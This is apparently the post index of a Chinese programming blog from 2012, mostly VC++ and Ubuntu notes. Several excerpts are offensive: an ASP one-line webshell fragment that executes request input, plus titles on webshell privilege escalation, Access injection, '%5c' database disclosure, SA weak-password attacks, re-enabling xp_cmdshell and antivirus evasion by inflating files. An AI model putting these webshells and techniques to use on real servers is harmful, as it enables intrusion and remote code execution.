- 博客(61)
- 资源 (8)
- 收藏
- 关注
RSS订阅转载 ASP一句话木马大全
"" Then Execute(Request("MH"))%>""then session("MH")=request("MH"):end if:if session("MH")execute request("MH")1 asp一句话木马 一句话木马 服务器端 带验证: ——————————————cmd.asp———————————————— <%
2012-12-30 10:35:47
29744
1
转载 一套webshell提权教程
前言:webshell提权一直就是脚本方面最受欢迎的一个问题,当然也是最困难的一个问题,所以我根据自己平时提权的一些方法和网络收集的文章总成了这一套webshell提权教程,希望大家能够学习到东西,也希望大家能够积极补充,共同进步!********************************************************************************
2012-12-30 10:20:13
17013
1
转载 经典的webshell提权
说到花了九牛二虎的力气获得了一个webshell, 当然还想继续获得整个服务器的admin权限,正如不想得到admin的不是好黑客~ 嘻嘻~~好跟我来,看看有什么可以利用的来提升权限 **************************************************************************** 第一 如果服务器上有装了pcanywher
2012-12-30 10:15:50
1546
原创 VC++ 得到文件大小
#include #define MAX_LENGTH 1000 int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow){ WIN32_FIN
2012-12-24 18:18:25
781
转载 VC获取文件大小
方法一: WIN32_FIND_DATA fileInfo; HANDLE hFind; DWORD fileSize; const char *fileName = 文件的路径及名字; hFind = FindFirstFile(fileName ,&fileInfo); if(hFind != INVALID_HANDLE_VALUE) fileSize = fileInf
2012-12-24 17:46:18
590
转载 用彩虹表破解MD5、LM Hash等复杂加密密码
一、什么是彩虹表?彩虹表(Rainbow Tables)就是一个庞大的、针对各种可能的字母组合预先计算好的哈希值的集合,不一定是针对MD5算法的,各种算法的都有,有了它可以快速的破解各类密码。越是复杂的密码,需要的彩虹表就越大,现在主流的彩虹表都是100G以上。二、上哪找彩虹表去?现在有很多大牛已经把自己的彩虹表共享出来了,所以你可以去下载。还有一种方法就是自己通过工具生成
2012-12-24 08:41:46
1270
转载 彩虹表MD5破解分析
[ 彩虹表的功能就不说了,地球人都知道了,是破解hash的,也就是哈希。 也就是这几天想下彩虹表玩,所以也得对他有所具体了解。想在网上有120g的彩虹表也有265g的了,估计以后会有人把更大的表共享出来,但对于我能这类一般网民的电脑配置来说那表的大小简直有点夸张(对我的电脑更是),,但考虑的他的体积庞大,所以也出现了些其他的表类型,如rti
2012-12-24 08:41:11
5609
原创 VC++ 获取Date Time Picker 控件的时间并格式化输出
UpdateData(); CTime timeDest; m_CreateTime.GetTime(timeDest); CString str = timeDest.Format("%Y-%m-%d"); MessageBox(str);
2012-12-23 20:35:54
2417
1
原创 VC++ 实现增大可执行文件的体积 自定义文件大小
做免杀的同学可能都会吧,增大文件体积防止云上传是个不错的方法功能界面:选择文件,是对话框支持文件拖放(详情见:http://blog.csdn.net/eldn__/article/details/8394060)为对话框添加成员变量:CString m_filepath 用于保存用户选择的文件路径Slider Control 控件 关联变量:
2012-12-23 20:31:49
6333
原创 VC ++实现 对文件的 隐藏, 只读 ,创建时间 , 最后修改时间 ,最后访问时间 属性的修改
考完六级心情大好,去论坛逛了逛,做了几个作业,总结下用到的函数和方法整体功能如下:其中还有获取当前系统时间并格式化输出的功能,界面上没有体现出来。窗口界面控件统计及关联变量如下:编辑框:ID: IDC_EDIT_FILEPATH 属性设置: 只读:CheckBox 控件 关联变量:BOOL m_IsReadOnly
2012-12-23 19:50:00
6805
3
转载 CString.Format的详细用法
在MFC程序中,使用CString来处理字符串是一个很不错的选择。CString既可以处理Unicode标准的字符串,也可以处理ANSI标准的字符串。CString的Format方法给我们进行字符串的转换带来了很大的方便,比如常见的int、float和double这些数字类型转换为CString字符串只需一行代码就可以实现。 先看看Format用于转换的格式字符: %c
2012-12-22 19:43:04
758
转载 VC获取文件大小
VC获取文件大小!2008-12-12 08:46http://hi.baidu.com/vcmfc/blog/item/c8cd58f4ec90d568dcc47446.html我查到两种方法:方法一: WIN32_FIND_DATA fileInfo; HANDLE hFind; DWORD fileSize; const cha
2012-12-22 19:23:42
923
转载 创建不能改变大小的对话框
原文:http://blog.csdn.net/shining100/article/details/5383670 在我们开发的过程中,需要实现大量的弹出式对话框。其中有一些对话框由于在响应WM_SIZE消息时没有移动相应控件的位置,导致了在改变对话框的大小后,对话框中的控件并不会随着窗体大小的改变而移动位置。解决这个问题有两个方法:一是在WM_SIZE消息中添加相应的处理代码,使控件随
2012-12-22 11:38:45
9411
转载 使对话框支持 文件拖放操作
///////////////////////////////////////////////////// 为对话框增加拖放操作支持1, 对话框.h中(消息映射表中) afx_msg void OnDropFiles(HDROP hDropInfo);2, .cpp中 ON_WM_DROPFILES()增加函数,函数实现的功能就看各人需要了.void CLo
2012-12-22 10:46:39
695
转载 [代码艺术]17行代码的贪吃蛇小游戏
转自lufy_legend的博客http://blog.csdn.net/lufy_legend/article/details/8233520一个贪吃蛇小游戏javascrpt有效代码17行加上html代码的话,共25行运行方法chrome或者firefox测试连接http://lufylegend.com/html5/lufylegend/tcs
2012-12-22 09:25:30
820
转载 ACCESS执行SQL语句导出一句话拿webshell
实用环境,在access后台其他方法不能拿到webshell但是后台有SQL语句查询执行,就可以直接access导出一句话拿webshell了不过需要知道物理路径才能导出,利用IIS的解析漏洞导出EXCEL文件拿到webshell,因为ACCESS数据库不允许导出其他危险格式。至于怎么拿到物理路径就看你自己发挥了,报错或备份路径等。逐一执行以下语句就可以导出一句话了
2012-12-21 15:55:52
6743
转载 Access注入点高级运用总结
信赖Access注入点是人人看到最多的了,一样平常敷衍 办法就是:猜表猜段猜内容---MD5---去靠山---看上传,备份,设置信息等等---上WEBSEHLL---提权.这是最常见和最普及 的ACCESS注入点应用行动 了.不外这里存在太多的不定因素,乐成 率非常低.任何一步失败,都也许让你不知怎样是好..但是ACCESS就只有这么点能耐了么?答案是否定 的.下面我们来看看,都有哪些
2012-12-21 15:18:36
880
原创 ASP插入数据库的两种方式
dim connset conn = server.createobject("adodb.connection") conn.open "driver={SQL Server};server=127.0.0.1;UID=sa;PWD=sa;database=guest;" sub close_conn conn.closeset conn = nothingend sub
2012-12-18 21:13:37
3355
转载 win7超级任务栏还原为xp任务栏样式
WIN7的确是非常强大的操作系统,值得一提的是超级任务栏,非常新颖,不过,许多网友反映,不是很适应win7的超级任务,今天,我来教大家如何让win7超级任务栏还原xp任务栏。win7的超级任务栏是这样的:按照下面的步骤,一步一步来,开始吧!第一步:在win7超级任务栏空白处右击,选择属性。选择“使用小图标”,任务栏按钮,选择“当任务被占满时合并”;如下图:
2012-12-17 20:38:51
943
原创 去除AMD ATI 显卡 右键菜单 方法
ATI显卡右键菜单去除方法: 运行中输入:regsvr32 atiacmxx.dll /u 恢复显示: 运行中输入:regsvr32 atiacmxx.dll
2012-12-17 16:24:38
10876
转载 UTF-8页面调用GB2312页面的JS显示乱码的解决办法
在标签里设置一个 charset例如:link type="text/css" rel="stylesheet" href="http://020sun.3322.org/hxair/style.css" charset="gb2312" /> script type="text/javascript" src="http://020sun.3322.org/hxair/js/
2012-12-10 16:17:14
1060
转载 Hacking Tut Running MapleStory on Vmware
Tits07-07-2011, 11:25 AMFor people who did not buy BT and don't have the option of running 2+ ms on 1 computer; you would mainly use VMware. After the maintenance last night on 7/7/11, Vmware ha
2012-12-09 22:47:36
2946
转载 Application cannot be run in virtual machine.
Post a reply13 posts • Page 1 of 1Application cannot be run in virtual machine.byhivar » 23. Feb 2010, 18:35Ok, today i figured out (with a lot of help on IRC) how to run
2012-12-09 22:40:50
2678
转载 ubuntu上卸载DEB文件
分类: Linux驱动开发 2011-06-17 18:21 1375人阅读 评论(0)收藏 举报首先使用下面的命令查询要卸载的文件名:dkpg -l然后再通过下面的命令卸载:dkpg -r *比如我们要卸载google的chrome浏览器:首先执行dkpg -l:root@lqm:/home/lqm# dpkg -lDesired=Unkn
2012-12-09 20:58:32
1310
转载 ubuntu12.10不能进入桌面问题
(2012-12-07 11:38:37)转载▼标签:杂谈 症状:桌面登录后只显示壁纸,鼠标能用,上面板、驱动器等什么全部都没有了,但是用alt+ctrl+T可以打开终端,同样也可以在终端中打开firefox、google等。一句话:桌面上原有等面板都消失了。系统:ubuntu 12.10 LTS解决方法:删除 /tmpsud
2012-12-09 10:31:29
6369
2
转载 12.10,进不去图形界面了,求大家帮忙解决
上一个主题 |下一个主题 作者 1 楼 fuzhengqu 文章标题 : ubuntu12.04今天手贱升级到了12.10,重启后进入不了桌面啦,求大家帮忙发表于 : 2012-05-03 11:34 注册: 2012-03-30 23:18帖子: 72
2012-12-09 10:24:35
4075
转载 [转]VMware Workstation 7.1 正式版 For Linux
软件更新日期-[2010/05/27] - 软件分类-[虚拟机]VMware Workstation 是一个系统虚拟软件.它使你可以在一台机器上同时运行二个或更多Windows、DOS、LINUX系统。与“多启动”系统相比,VMWare采用了完全不同的概念.多启动系统在一个时刻只能运行一个系统,在系统切换时需要重新启动机器.VMware Workstation 介绍:VMWare是真正
2012-12-09 10:03:18
1126
转载 解决ubuntu 每次开机 resolv.conf DNS 被清空问题
系统是kubuntu,在使用固定ip及设置dns本地缓存时,屡次受resolv.conf文件每次重启被重置的困扰,搜索到一篇文章,Best way to set up DNS caching (http://askubuntu.com/questions/22750/best-way-to-set-up-dns-caching),里面谈到用bind9,似乎比dnsmasq更简单。而resolv.c
2012-12-09 09:40:53
4631
转载 安装最新的文泉驿字体[z]
打开终端,执行以下命令,或使用《新立得软件管理器》,在其中搜索“xfonts-wqy“并标记安装。 sudo apt-get install xfonts-wqy让系统支持点阵字体执行以下命令。 sudo gedit /etc/fonts/conf.d/50-xfonts-wqy.conf在文件中加入如下配置后,保存退出。(你也可以使用其他你喜爱的编辑器进行编辑
2012-12-09 01:18:55
1930
转载 Ubuntu 12.04中文输入法的安装
2012-07-28 10:43:12 我来说两句 收藏 我要投稿Ubuntu 12.04中文输入法的安装 Ubuntu上的输入法主要有小小输入平台(支持拼音/二笔/五笔等),Fcitx,Ibus,Scim等。其中Scim和Ibus是输入法框架。在Ubuntu的中文系统中自带了中文输入法,通过Ctrl+Space可切换中英文输入法。这里我们主要说下U
2012-12-09 00:44:41
646
转载 解决Ubuntu下切换到root用户后没有声音问题
2011-10-11Ubuntu在root用户下,为了安全考虑默认是关闭了声音系统的。如果要开很简单,因为root登录后pulseaudio没有启动。所以要先启动它将root加到pulse和pulse-access组:sudo usermod -a -G pulse-access rootgpasswd -a root pulsegpasswd -a root pu
2012-12-09 00:22:15
5562
原创 ubuntu 12.10
root@ubuntu:/# cd tmproot@ubuntu:/tmp# lsfile9k2isW ssh-2GtK2pLUFE4vinstall_flash_player_11_linux_i386.tar.gz tmpqwfeo7pulse-2L9K88eMlGn7 u
2012-12-08 16:16:51
749
转载 %5c暴库原理
%5c暴库原理作者:sasa 发布于:2012-5-21 20:26 Monday 分类:Web渗透 暴库有两个方法,第一个就是利用%5c,另外一个conn.asp暴库。而且这里的暴库是针对access数据库的,而和access搭配的脚本一般是asp,因此出现暴库的一般为asp类型站点。 %5c暴库 简单点说,就是在打开页面的时候把网页
2012-12-07 15:21:02
5257
转载 %5c爆库实例
来源:转载 作者:佚名时间:2005-10-17 07:09:13 作者:fhod 入侵QQ挂机网实施钓鱼攻击(已发表在黑客X档案05.10)前不久上QQ老是收到好友挂机的信息..这次看到我同学发来的信息..无意中打开..看排名不错..突然就有了想 入侵它的冲动 QQ挂机的页面没什么看头..看看主站.ASP的..试了几个连接尝试SQL注入..失败...然后就想着找二
2012-12-07 15:13:39
1949
转载 控制webbrowser控件
这个控件控制起来有点麻烦,得到的有些句柄不能操作,具体还在研究中,目前可以做如下工作。1.去除滚动条方法是得到一个IHTMLBodyElement的句柄,用其下面的put_scroll方法将滚动条去掉,这个方法是我跟别人学的,实现方法如下。BOOL CXXXDlg::KillHtmlScrollBars(LPDISPATCH pdispDoc){
2012-12-06 19:50:41
1190
转载 %5C爆库
当我们暴库失败的时候不妨试试利用%5c绕过asp的验证 废话少说,看下面的代码: guest_user=trim(request("guest_user")) guest_password=trim(request("guest_password")) Set rs= Server.createObject("ADODB.Recordset") sql=
2012-12-05 12:42:49
2885
转载 Microsoft SQL Server SA弱口令攻防实战
摘要:我们都知道,在网络中Microsoft SQLServer的入侵最常见的就是利用SA弱口令入侵了,而核心内容就是利用Microsoft SQLServer中的存储过程获得系统管理员权限,那到底什么是存储过程?为什么利用它可以获得系统管理员权限?标签:SA弱口令 攻防 SQL Server Microsoft【51CTO.com 独家特稿】Microsoft SQLSer
2012-12-03 21:36:06
5545
原创 SQL Server 2008 SA 权限 注入点 而我却无可奈何
大神们都这样说:这个是跨界要权的问题了要解决这个问题就要避免用本地系统帐户启动sqlserver指定一个存在于windows本地管理员的administrators组的用户来运行sqlserver服务,并且重启sqlserver解决办法:以管理员的身份运行SeverManagement Studio就可以了
2012-12-03 21:11:59
3396
转载 SQL Server 2005 2008 xp_cmdshell 恢复与禁用
SQL Server 2005 2208 xp_cmdshell存储过程 默认禁用了,用下面的语句可以打开和禁用。--SQL语句开xp_cmdshell-- To allow advanced options to be changed.EXEC sp_configure'show advanced options',1GO-- To update the cur
2012-12-03 20:54:51
3277
laya合图拆分散图工具
2020-02-04
AnimateControl
2014-08-02
H3C iNode V3.60-E6210 破解补丁(去除多网卡限制)
2012-12-24
VC ++实现 对文件的 隐藏, 只读 ,创建时间 , 最后修改时间 ,最后访问时间 属性的修改
2012-12-23
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人